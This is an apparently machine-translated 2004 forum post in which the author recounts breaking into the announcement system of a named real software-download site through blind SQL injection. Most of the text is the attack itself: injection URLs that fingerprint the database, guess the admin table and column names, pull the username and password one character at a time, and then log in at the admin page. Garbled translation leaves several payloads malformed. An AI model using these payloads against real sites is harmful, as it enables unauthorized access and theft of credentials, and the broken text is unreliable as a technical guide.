As a representative of the domestic crack software website, 凡 (http://www.crsky.net) Due to security issues, the forum has closed for a while. I have no intention to go to the main station, haha, the announcement system actually SQL injected into the vulnerability, and then one of the following articles. . .
Start with
http://www.crsky.net/zhnew/show.asp?id=26 and 1 = 1 tried to find no error. Haha. has hope. .
http://www.crsky.net/zhnew/show.asp?id=26 and 1 = 2 error, it seems that there is SQL injection vulnerability. .
First of all, to judge the database type
Submit http://www.crsky.net/ennew/show.asp?id=26 and (select count (*) from sysobjects>; 0 error. .
It is estimated that Access is
Next, guess the famous name. .
Submit http://www.crsky.net/ennew/show.asp?id=26 and (select count (*) from admin)>; = 0 haha. . Returns normal. . . . I got a table name at once. .
Then guess the field of the user name.
Submit http://www.crsky.net/zhnew/show.asp?id=26 and (select count (user) "; = 0 is wrong, it seems that there is no User field.
Try http://www.crsky.net/zhnew/show.asp?id=26 and (select count (username) from admin>; = 0 dizzy, or wrong. .
. . . . . . . .
Finally http://www.crsky.net/zhnew/show.asp?id=26 and (select count (name) from admin)> = 0 returns to normal. . . We also got a username field name
I have to guess the field of the password afterwards.
Submit http://www.crsky.net/ennew/show.asp?id=26 and (select count (password) from admin)> = 0 is wrong, and then guess. .
. . . . . . . . . . . . .
Finally http://www.crsky.net/zhnew/show.asp?id=26 and (select count (pwd) from admin)> = 0 haha, normal. . . We have got a password field PWD
gosh. . Really tired. . Drink the mouth of the water.
Guess the user name. .
First, the length of the user name.
Submit http://www.crsky.net/ennew/show.asp?id=26 and (select top 1 len (name) from admin>; 2 Return to normal submit http://www.crsky.net/ennew/ Show.asp? id = 26 and (select top 1 len (name) from admin>; 4 error submit http://www.crsky.net/zhnew/show.asp?id=26 and (SELECT TOP 1 LEN Name) from admin "; 3 normal
It is concluded that the user name is 4. No matter whether his password is encrypted. . Get the username again
Guess the first place in the username. . http://www.crsky.net/zhnew/show.asp?id=26 and (SELECT TOP 1 ASC (MID (Name, 1, 1)) from admin)>; 0 Error http://www.crsky .NET / ZHNEW / Show.asp? id = 26 and (SELECT TOP 1 ASC (MID (Name, 1, 1)) from admin) <; 128 Returns normal http://www.crsky.net/ennew/show. ASP? ID = 26 and (SELECT TOP 1 ASC (MID (Name, 1, 1)) from admin)> 1 error! ! ! It seems that the ASC code is negative, it is Chinese. . . . . . . . . . . .
Guess your username: escape Xiaolong
Guess code. .
Less connotance the length of the password.
Submit http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len (pwd) from admin "; 2 Return to normal submit http://www.crsky.net/ennew/ Show.asp? id = 26 and (select top 1 len (pwd) from admin>; 4 error submit http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 lin) (SELECT TOP 1 PWD) from admin)>; 3 normal
The length of the password is also 4. Haha. . . Will it be the same as the username. . .
No matter, I don't know the administrator's entrance. . .
guess. . http://www.crsky.net/ennew/index.asp is wrong. . . . . .
http://www.crsky.net/ennew/login.asp found. .
Try the username and password with the escape Dragon. . .
Success! ! ! ! ! !
I have issued an announcement. Remind the webmaster. . See http://www.crsky.net/ennew/show.asp?id=31
tired. . Go to sleep. . . 2004 .8
